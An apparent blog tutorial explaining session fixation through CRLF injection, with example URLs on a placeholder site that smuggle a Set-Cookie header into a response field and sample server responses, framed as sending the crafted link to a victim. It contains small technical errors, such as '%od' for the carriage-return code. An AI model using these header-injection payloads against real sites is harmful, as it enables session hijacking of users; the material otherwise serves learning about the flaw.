How to do session fixation with HTTP header injection

0
205

Hi guys , looking like more unfamiliar with these terms ? ok , I will make it clear as far as I know. Network works on server – client communication. Where the server serves the request given by the client who is also an end user.

So , to bring a acknowledged communication between the server and the client the HTTP header is involved here. HTTP header allow the client or server to pass information over the request and response.

What is session fixation?

Whenever the client made a request to the server the response will be generated with the session ID which is unique for a website user. This session Id is set by the server to the client for a specific duration of time. It can be stored as a cookie, a form field or an url.

A cookie is nothing but a .txt file that is sent by the web server to the users browser and store it temporarily for the session or permanently. It is used to know the preferences of the user for the particular website. So, by setting this session id manually without the knowledge of the server we can fix the session of the user by sending the modified url with the session id in it.

This will be a major vulnerability in a website if it allows the user to modify the header and does not filter any unwanted characters. This session fixation is done with the help of CRLF injection or HTTP response splitting .

CRLF injection : (Carriage Return, New line and Line Feed Characters)

Whenever you do something on text editor or any other and hit enter your cursor moves on to the next line right ?  and how it works like that by finding the End of line or returns to the beginning when you delete everything .

yeah, you made a right guess this feature is contributed by the Carriage return characters. Now we are going to use this CRLF  injection with the HTTP  response of the web server. The reason for using injection this will be known in this explanation.

Now lets give a deep look on the website response to the normal request like this

https://www.sitename.com/redirect.php?origin=normal

And after posting the request you will get a HTTP response like this

HTTP/1.1 200 OK

Date:  Sun, 21 Oct 2018 11:01:23 GMT

Origin: normal

Content-Type: text/html

Connection: close

Server: cloudflare-nginx

CF-RAY: aefuehif3252biuggr-ABM

This is how a normal HTTP response header looks like. Noticed something here…? The parameter of the origin header reflects in the HTTP response . so this is the only way that we couls craft the http header by crafting the URL and make difference in the normal HTTP response . so the main objective is to modify the origin with the help of CRLF injection with brings a legitimate change in the response header.

okayyyy…Now lets do the URL crafting to add  a custom session id to the HTTP response headers.

https://www.sitename.com/redirect.php?origin=set-cookie:SessionID=hacked

Hit enter and look at the response now,

HTTP/1.1 200 OK

Date:  Sun, 21 Oct 2018 11:01:23 GMT

Origin: Set-Cookie: SessionID=hacked

Content-Type: text/html

Connection: close

Server: cloudflare-nginx

CF-RAY: aefuehif3252biuggr-ABM

OOPS…! Why did  we get the custom header on the the same line of the origin header. Sorry folks, we missed the concept of CRLF  injection here . let us craft the URL again..

https://www.sitename.com/redirect.php?origin=done%od%0aset-cookie:SessionID=hacked

Yes we made it. Now lets look at the response once again hoping for good result.

HTTP/1.1 200 OK

Date:  Sun, 21 Oct 2018 11:01:23 GMT

Origin: done

Set-Cookie: SessionID=hacked

Content-Type: text/html

Connection: close

Server: cloudflare-nginx

CF-RAY: aefuehif3252biuggr-ABM

Yaash guys, we added the custom header to the response of the web server. So, when we sent the crafted url to the victim and he loads it. The cookie hacked will be store In the browser and this what we call as a session fixation attack.

LEAVE A REPLY

Please enter your comment!
Please enter your name here

This site uses Akismet to reduce spam. Learn how your comment data is processed.